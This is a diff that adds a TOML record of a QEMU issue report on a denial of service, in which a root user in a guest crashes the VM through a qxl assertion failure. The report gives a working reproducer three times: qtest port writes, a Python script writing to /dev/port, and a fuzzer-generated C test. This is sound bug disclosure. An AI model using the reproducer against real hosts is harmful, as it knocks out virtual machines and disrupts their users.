Diffstat (limited to 'gitlab/issues/target_missing/host_missing/accel_missing/1829.toml')
-rw-r--r--gitlab/issues/target_missing/host_missing/accel_missing/1829.toml96
1 files changed, 96 insertions, 0 deletions
diff --git a/gitlab/issues/target_missing/host_missing/accel_missing/1829.toml b/gitlab/issues/target_missing/host_missing/accel_missing/1829.toml
new file mode 100644
index 00000000..1eed4f52
--- /dev/null
+++ b/gitlab/issues/target_missing/host_missing/accel_missing/1829.toml
@@ -0,0 +1,96 @@
+id = 1829
+title = "DoS via assert failure by guest user"
+state = "closed"
+created_at = "2023-08-14T09:12:19.865Z"
+closed_at = "2023-08-17T11:35:34.590Z"
+labels = ["Closed::Duplicate", "spice"]
+url = "https://gitlab.com/qemu-project/qemu/-/issues/1829"
+host-os = "Ubuntu"
+host-arch = "x86_64"
+qemu-version = "8.0.92 (v8.1.0-rc2-80-g 0450cf0897\\-dirty), commit 0450cf08976f9036feaded438031b4cba94f6452"
+guest-os = "Debian"
+guest-arch = "x86_64"
+description = """As root in guest VM user can execute special script, which crashes the whole VM with error
+
+```plaintext
+hw/display/qxl.c:1594 inside of function void qxl_set_mode(PCIQXLDevice *, unsigned int, int): Assertion `qxl_add_memslot(d, 0, devmem, QXL_SYNC) == 0` failed
+```"""
+reproduce = """1. This bug can be reproduced with:
+
+   ```bash
+   cat << EOF | ./build/qemu-system-x86_64 -vga qxl -m 2048 -nodefaults -qtest stdio
+   outl 0xcf8 0x8000101c
+   outl 0xcfc 0xc000
+   outl 0xcf8 0x80001001
+   outl 0xcfc 0x01000000
+   outl 0xc006 0x00
+   EOF
+   ```
+2. Also, we can execute this python3 script inside guest VM as root (to invoke VM use command: **_qemu-system-x86_64 -vga qxl -hda debian.img -m 2048 -nodefaults_**):
+
+   ```python
+   import os
+   f = os.open("/dev/port", os.O_RDWR|os.O_NDELAY)
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\\x80\\x00\\x10\\x1c')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\\xc0\\x00')
+   l = os.lseek(f, 0xcf8, 0)
+   os.write(f, b'\\x80\\x00\\x10\\x01')
+   l = os.lseek(f, 0xcfc, 0)
+   os.write(f, b'\\x01\\x00\\x00\\x00')
+   l = os.lseek(f, 0xc006, 0)
+   os.write(f, b'\\x00')
+   ```
+
+   This script causes VM to crash.
+
+   [PoC_qxl-vga_crash.mkv](/uploads/7ee262c20dca69aa9417812f6a93a532/PoC_qxl-vga_crash.mkv)"""
+additional = """This issue was found by fuzzing. Here is an auto-generated C source code for a test case that will reproduce the bug.
+
+```plaintext
+/*
+ * Autogenerated Fuzzer Test Case
+ *
+ * Copyright (c) 2023 Artem Nasonov <anasonov@astralinux.ru>
+ *
+ * This work is licensed under the terms of the GNU GPL, version 2 or later.
+ * See the COPYING file in the top-level directory.
+ */
+
+#include "qemu/osdep.h"
+
+#include "libqtest.h"
+
+/*
+ * cat << EOF | qemu-system-x86_64 -vga qxl -hda \\
+ * ~/Downloads/virtualdebian.img -m 2048 -nodefaults -qtest stdio
+ * outl 0xcf8 0x8000101c
+ * outl 0xcfc 0xc000
+ * outl 0xcf8 0x80001001
+ * outl 0xcfc 0x01000000
+ * outl 0xc006 0x00
+ * EOF
+*/
+static void test_qxl_set_mode(void)
+{
+QTestState *s = qtest_init("-vga qxl -m 2048 -nodefaults");
+qtest_outl(s, 0xcf8, 0x8000101c);
+qtest_outl(s, 0xcfc, 0xc000);
+qtest_outl(s, 0xcf8, 0x80001001);
+qtest_outl(s, 0xcfc, 0x01000000);
+qtest_outl(s, 0xc006, 0x00);
+qtest_quit(s);
+}int main(int argc, char **argv)
+{
+    const char *arch = qtest_get_arch();
+
+    g_test_init(&argc, &argv, NULL);
+
+   if (strcmp(arch, "x86_64") == 0) {
+        qtest_add_func("fuzz/test_qxl_set_mode",test_qxl_set_mode);
+   }
+
+   return g_test_run();
+}
+```"""